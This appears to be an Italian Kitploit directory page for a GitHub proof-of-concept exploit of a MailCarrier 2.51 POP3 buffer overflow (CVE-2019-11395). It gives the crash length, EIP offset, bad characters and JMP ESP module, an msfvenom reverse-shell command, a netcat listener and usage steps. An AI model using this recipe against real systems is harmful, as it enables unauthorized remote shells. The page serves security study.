Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-11395 — # Exploit Python per CVE-2019-11395, un buffer overflow nel servizio POP3 di MailCarrier 2.51 Genera un payload di reverse shell tramite msfvenom e consente l'esecuzione remota di codice su target Windows. | Kitploit
Strumenti/GitHubGitHub/caioprince/cve-2019-11395
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodePenetration TestingBinary Exploitation
GitHubcaioprince/cve-2019-11395

CVE-2019-11395

# Exploit Python per CVE-2019-11395, un buffer overflow nel servizio POP3 di MailCarrier 2.51 Genera un payload di reverse shell tramite msfvenom e consente l'esecuzione remota di codice su target Windows.

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-11395 Exploit 🛡️

Informazioni su CVE-2019-11395 🕵️

La vulnerabilità CVE-2019-11395 descrive una vulnerabilità di buffer overflow nell'applicazione di posta elettronica MailCarrier 2.51, che consente l'esecuzione remota di codice. La vulnerabilità si verifica nei processi SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP o POP3 RETR.

Durante lo studio accademico, l'attenzione è stata focalizzata sui processi POP3 per creare una Proof of Concept (PoC). È stato identificato che l'invio di 6000 byte all'applicazione ne causa l'arresto del funzionamento, rivelando così la vulnerabilità di buffer overflow.

Fasi di sfruttamento 🔍

  1. Ho utilizzato msf-pattern_create -l 6000 per identificare con precisione l'EIP.
  2. Ho identificato l'offset dell'EIP con msf-pattern_offset -q 6E47386E -l 6000, ottenendo un offset dell'EIP di 5095.
  3. Ho identificato expsrv.dll con ASLR disabilitato, adatta per un JMP ESP.
  4. Ho identificato i caratteri non validi \x00\x0a\x0d durante i test per i caratteri non consentiti.
  • Ho generato il payload con msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
  • Ho adattato il codice di CVE-2019-11395.py per ospitare il payload.
  • Ho aperto una connessione con nc -lnvp 4444 ed eseguito l'exploit (CVE-2019-11395.py) per ottenere l'accesso all'ambiente e validare la CVE descritta.
  • Utilizzo 🚀

    Segui questi passaggi per utilizzare l'exploit:

    1. Genera il payload utilizzando msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.
    2. Copia l'output del comando msfvenom.
    3. Adatta il codice di CVE-2019-11395.py per sostituire la variabile shellcode con l'output ottenuto dal comando msfvenom.
    4. Esegui l'exploit (CVE-2019-11395.py) per ottenere l'accesso all'ambiente e validare la CVE descritta.

    Ambiente compromesso 📸

    PoC CVE-2019-11395

    🔗 Connettiti con me

    Visita il mio profilo su LinkedIn

    Scarica lo strumento